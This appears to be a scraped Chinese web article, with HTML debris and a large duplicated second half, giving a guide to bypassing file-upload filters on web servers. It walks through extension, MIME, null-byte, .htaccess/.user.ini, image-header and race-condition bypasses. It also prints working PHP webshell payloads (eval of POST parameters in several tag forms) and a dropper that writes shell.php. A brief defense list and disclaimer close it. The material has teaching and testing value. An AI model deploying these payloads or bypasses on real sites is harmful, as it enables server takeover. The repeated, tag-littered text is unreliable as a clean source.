文件上传绕过技术全面指南<\/h1>

一、本地JS绕过方法<\/h2>

禁用JS或删除JS语句<\/strong>：通过浏览器设置禁用JavaScript或直接删除页面中的JS验证代码<\/p> <\/li>

后缀名修改绕过<\/strong>：<\/p>

将上传文件的后缀名从.php<\/code>改为.jpg<\/code><\/li>
通过Burp Suite等工具抓包，将.jpg<\/code>改回.php<\/code><\/li> <\/ul> <\/li> <\/ol> 二、黑名单绕过技术<\/h2> 1. 相似后缀名绕过<\/h3> 语言<\/th> 等价扩展名<\/th> <\/tr> <\/thead> PHP<\/td> phtml, php2, php3, php4, php5, phps<\/td> <\/tr> ASPX<\/td> ashx, asmx, ascx<\/td> <\/tr> ASP<\/td> asa, cer, cdx<\/td> <\/tr> JSP<\/td> jspx, jspf<\/td> <\/tr> <\/tbody> <\/table> 2. 大小写绕过<\/h3> 适用系统<\/strong>：仅Windows<\/li> 原理<\/strong>：匹配时区分大小写而解析时不区分<\/li> 方法<\/strong>：抓包修改文件名，任意选择部分字符转换大小写示例：test.php<\/code> → test.Php<\/code><\/li> <\/ul> <\/li> <\/ul> 3. 空格绕过<\/h3> 在文件名前后添加空格（主要加在后面）<\/li> Windows特性<\/strong>：文件名中空格会被作为空处理<\/li> 示例："test.php"<\/code>、test.php "<\/code><\/li> <\/ul> 4. 点绕过<\/h3> 在文件后缀名后添加点，如shell.php.<\/code><\/li> 或使用空格+点号：test.php .<\/code><\/li> 系统差异<\/strong>： Windows：最后一个点会被自动去除<\/li> Linux：最后一个点不会被去除<\/li> <\/ul> <\/li> <\/ul> 5. ::$DATA<\/code>绕过<\/h3> 适用系统<\/strong>：仅Windows<\/li> 原理<\/strong>：Windows会自动去除文件后的::$DATA<\/code>字符串<\/li> 示例：test.php::$DATA<\/code> → 实际保存为test.php<\/code><\/li> 注意<\/strong>：访问时不加::$DATA<\/code><\/li> <\/ul> 6. 双写绕过<\/h3> 适用场景<\/strong>：过滤方式是删除指定字符串时<\/li> 方法<\/strong>：将文件后缀名中的关键字重复写入示例：pphphp<\/code>（过滤php<\/code>后变为php<\/code>）<\/li> <\/ul> <\/li> 防御<\/strong>：使用递归循环过滤而非单次过滤<\/li> <\/ul> 三、特殊文件绕过<\/h2> 1. .htaccess<\/code>文件绕过<\/h3> 前提条件<\/strong>：<\/p> mod_rewrite模块开启<\/li> AllowOverride All<\/li> 中间件为Apache（不支持Nginx）<\/li> <\/ul> <\/li> 利用方法<\/strong>：<\/p> <FilesMatch<\/span> "test.jpg"<\/span>><\/span> <\/span><\/span> SetHandler application\/x-httpd-php <\/span><\/span><\/FilesMatch><\/span> <\/span><\/span><\/code><\/pre>此配置可将test.jpg<\/code>当作PHP文件解析执行<\/p> <\/li> <\/ul> 2. .user.ini<\/code>文件绕过<\/h3> 前提条件<\/strong>：<\/p> 服务器脚本语言为PHP<\/li> 服务器使用CGI\/FastCGI模式<\/li> 上传目录下有可执行的PHP文件<\/li> <\/ol> <\/li> 利用方法<\/strong>：<\/p> 创建.user.ini<\/code>文件，内容： auto_prepend_file=test.txt <\/code><\/pre> <\/li> 上传.user.ini<\/code><\/li> 创建test.txt<\/code>包含Webshell代码<\/li> 上传test.txt<\/code><\/li> 访问上传目录下的PHP文件即可执行<\/li> <\/ol> <\/li> 特点<\/strong>：<\/p> 适用于Apache和Nginx<\/li> 比.htaccess<\/code>适用范围更广<\/li> <\/ul> <\/li> <\/ul> 四、白名单绕过技术<\/h2> 1. MIME验证绕过<\/h3> 方法<\/strong>：修改上传文件的Content-Type<\/code> 从application\/octet-stream<\/code>改为image\/png<\/code>等<\/li> <\/ul> <\/li> <\/ul> 2. %00截断<\/h3> 条件<\/strong>：<\/p> PHP版本<5.3<\/li> php.ini<\/code>中magic_quotes_gpc<\/code>为off<\/li> <\/ul> <\/li> 原理<\/strong>：系统遇到0x00<\/code>认为读取结束<\/p> <\/li> 示例<\/strong>：test.php%00.jpg<\/code><\/p> <\/li> <\/ul> 五、文件内容检测绕过<\/h2> 1. 文件头检测绕过<\/h3> 方法<\/strong>：在数据最前面添加图片文件头<\/li> 常见图片文件头<\/strong>： GIF：47 49 46 38 39 61<\/code> (GIF89a)<\/li> JPG\/JPEG：FF D8 FF<\/code><\/li> PNG：89 50 4E 47 0D 0A<\/code><\/li> <\/ul> <\/li> <\/ul> 2. 二次渲染绕过<\/h3> 场景<\/strong>：网站对图片进行二次处理（格式、尺寸调整等）<\/li> 方法<\/strong>：上传正常图片<\/li> 下载渲染后的图片进行对比<\/li> 找到渲染前后相同的数据块<\/li> 在相同处插入Webshell代码<\/li> <\/ol> <\/li> <\/ul> 六、其他绕过技术<\/h2> 1. 条件竞争<\/h3> 原理<\/strong>：利用文件上传后到删除前的时间差<\/li> 方法<\/strong>：上传包含以下代码的test.php<\/code>： <?<\/span>php<\/span> <\/span><\/span>fputs<\/span>(fopen<\/span>("..\/shell.php"<\/span>, "w"<\/span>), '<?php @eval($_POST["cmd"])?>'<\/span>); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> 立即访问test.php<\/code>生成shell.php<\/code><\/li> <\/ol> <\/li> <\/ul> 2. 多文件上传绕过<\/h3> 方法<\/strong>：第一份上传合法文件<\/li> 第二份上传木马文件<\/li> <\/ul> <\/li> 原理<\/strong>：系统可能只检查第一份文件<\/li> <\/ul> 3. PHP标签绕过<\/h3> 多种PHP标签形式<\/strong>： <?<\/span>php<\/span> @<\/span>eval<\/span>($_POST['cmd'<\/span>]);?><\/span> \/\/ 正常写法 <\/span><\/span><\/span><?=@eval($_POST['cmd']);?> \/\/ 短标签 <\/span><\/span><\/span><%@eval($_POST['cmd']);%> \/\/ ASP风格 <\/span><\/span><\/span><script language='php'>@eval($_POST['cmd']);<\/script> \/\/ <script>风格 <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ul> 七、防护建议<\/h2> 文件扩展名白名单校验<\/strong>：只允许特定类型文件上传<\/li> 文件内容校验<\/strong>：检查文件内容是否符合预期<\/li> 上传文件重命名<\/strong>：避免使用用户提供的文件名<\/li> 隐藏上传文件路径<\/strong>：防止直接访问上传文件<\/li> 递归过滤<\/strong>：对黑名单使用循环过滤而非单次过滤<\/li> 更新系统<\/strong>：保持PHP等环境最新版本<\/li> 配置安全设置<\/strong>：如关闭magic_quotes_gpc<\/code>等危险选项<\/li> <\/ol> 免责声明<\/h2> 本文所提供的技术信息仅供参考，不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》，作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。<\/p>

语言<\/th>	等价扩展名<\/th> <\/tr> <\/thead>
PHP<\/td>	phtml, php2, php3, php4, php5, phps<\/td> <\/tr>
ASPX<\/td>	ashx, asmx, ascx<\/td> <\/tr>
ASP<\/td>	asa, cer, cdx<\/td> <\/tr>
JSP<\/td>	jspx, jspf<\/td> <\/tr> <\/tbody> <\/table> 2. 大小写绕过<\/h3> 适用系统<\/strong>：仅Windows<\/li> 原理<\/strong>：匹配时区分大小写而解析时不区分<\/li> 方法<\/strong>：抓包修改文件名，任意选择部分字符转换大小写示例：test.php<\/code> → test.Php<\/code><\/li> <\/ul> <\/li> <\/ul> 3. 空格绕过<\/h3> 在文件名前后添加空格（主要加在后面）<\/li> Windows特性<\/strong>：文件名中空格会被作为空处理<\/li> 示例："test.php"<\/code>、test.php "<\/code><\/li> <\/ul> 4. 点绕过<\/h3> 在文件后缀名后添加点，如shell.php.<\/code><\/li> 或使用空格+点号：test.php .<\/code><\/li> 系统差异<\/strong>： Windows：最后一个点会被自动去除<\/li> Linux：最后一个点不会被去除<\/li> <\/ul> <\/li> <\/ul> 5. ::$DATA<\/code>绕过<\/h3> 适用系统<\/strong>：仅Windows<\/li> 原理<\/strong>：Windows会自动去除文件后的::$DATA<\/code>字符串<\/li> 示例：test.php::$DATA<\/code> → 实际保存为test.php<\/code><\/li> 注意<\/strong>：访问时不加::$DATA<\/code><\/li> <\/ul> 6. 双写绕过<\/h3> 适用场景<\/strong>：过滤方式是删除指定字符串时<\/li> 方法<\/strong>：将文件后缀名中的关键字重复写入示例：pphphp<\/code>（过滤php<\/code>后变为php<\/code>）<\/li> <\/ul> <\/li> 防御<\/strong>：使用递归循环过滤而非单次过滤<\/li> <\/ul> 三、特殊文件绕过<\/h2> 1. .htaccess<\/code>文件绕过<\/h3> 前提条件<\/strong>：<\/p> mod_rewrite模块开启<\/li> AllowOverride All<\/li> 中间件为Apache（不支持Nginx）<\/li> <\/ul> <\/li> 利用方法<\/strong>：<\/p> <FilesMatch<\/span> "test.jpg"<\/span>><\/span> <\/span><\/span> SetHandler application\/x-httpd-php <\/span><\/span><\/FilesMatch><\/span> <\/span><\/span><\/code><\/pre>此配置可将test.jpg<\/code>当作PHP文件解析执行<\/p> <\/li> <\/ul> 2. .user.ini<\/code>文件绕过<\/h3> 前提条件<\/strong>：<\/p> 服务器脚本语言为PHP<\/li> 服务器使用CGI\/FastCGI模式<\/li> 上传目录下有可执行的PHP文件<\/li> <\/ol> <\/li> 利用方法<\/strong>：<\/p> 创建.user.ini<\/code>文件，内容： auto_prepend_file=test.txt <\/code><\/pre> <\/li> 上传.user.ini<\/code><\/li> 创建test.txt<\/code>包含Webshell代码<\/li> 上传test.txt<\/code><\/li> 访问上传目录下的PHP文件即可执行<\/li> <\/ol> <\/li> 特点<\/strong>：<\/p> 适用于Apache和Nginx<\/li> 比.htaccess<\/code>适用范围更广<\/li> <\/ul> <\/li> <\/ul> 四、白名单绕过技术<\/h2> 1. MIME验证绕过<\/h3> 方法<\/strong>：修改上传文件的Content-Type<\/code> 从application\/octet-stream<\/code>改为image\/png<\/code>等<\/li> <\/ul> <\/li> <\/ul> 2. %00截断<\/h3> 条件<\/strong>：<\/p> PHP版本<5.3<\/li> php.ini<\/code>中magic_quotes_gpc<\/code>为off<\/li> <\/ul> <\/li> 原理<\/strong>：系统遇到0x00<\/code>认为读取结束<\/p> <\/li> 示例<\/strong>：test.php%00.jpg<\/code><\/p> <\/li> <\/ul> 五、文件内容检测绕过<\/h2> 1. 文件头检测绕过<\/h3> 方法<\/strong>：在数据最前面添加图片文件头<\/li> 常见图片文件头<\/strong>： GIF：47 49 46 38 39 61<\/code> (GIF89a)<\/li> JPG\/JPEG：FF D8 FF<\/code><\/li> PNG：89 50 4E 47 0D 0A<\/code><\/li> <\/ul> <\/li> <\/ul> 2. 二次渲染绕过<\/h3> 场景<\/strong>：网站对图片进行二次处理（格式、尺寸调整等）<\/li> 方法<\/strong>：上传正常图片<\/li> 下载渲染后的图片进行对比<\/li> 找到渲染前后相同的数据块<\/li> 在相同处插入Webshell代码<\/li> <\/ol> <\/li> <\/ul> 六、其他绕过技术<\/h2> 1. 条件竞争<\/h3> 原理<\/strong>：利用文件上传后到删除前的时间差<\/li> 方法<\/strong>：上传包含以下代码的test.php<\/code>： <?<\/span>php<\/span> <\/span><\/span>fputs<\/span>(fopen<\/span>("..\/shell.php"<\/span>, "w"<\/span>), '<?php @eval($_POST["cmd"])?>'<\/span>); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> 立即访问test.php<\/code>生成shell.php<\/code><\/li> <\/ol> <\/li> <\/ul> 2. 多文件上传绕过<\/h3> 方法<\/strong>：第一份上传合法文件<\/li> 第二份上传木马文件<\/li> <\/ul> <\/li> 原理<\/strong>：系统可能只检查第一份文件<\/li> <\/ul> 3. PHP标签绕过<\/h3> 多种PHP标签形式<\/strong>： <?<\/span>php<\/span> @<\/span>eval<\/span>($_POST['cmd'<\/span>]);?><\/span> \/\/ 正常写法 <\/span><\/span><\/span><?=@eval($_POST['cmd']);?> \/\/ 短标签 <\/span><\/span><\/span><%@eval($_POST['cmd']);%> \/\/ ASP风格 <\/span><\/span><\/span><script language='php'>@eval($_POST['cmd']);<\/script> \/\/ <script>风格 <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ul> 七、防护建议<\/h2> 文件扩展名白名单校验<\/strong>：只允许特定类型文件上传<\/li> 文件内容校验<\/strong>：检查文件内容是否符合预期<\/li> 上传文件重命名<\/strong>：避免使用用户提供的文件名<\/li> 隐藏上传文件路径<\/strong>：防止直接访问上传文件<\/li> 递归过滤<\/strong>：对黑名单使用循环过滤而非单次过滤<\/li> 更新系统<\/strong>：保持PHP等环境最新版本<\/li> 配置安全设置<\/strong>：如关闭magic_quotes_gpc<\/code>等危险选项<\/li> <\/ol> 免责声明<\/h2> 本文所提供的技术信息仅供参考，不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》，作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。<\/p>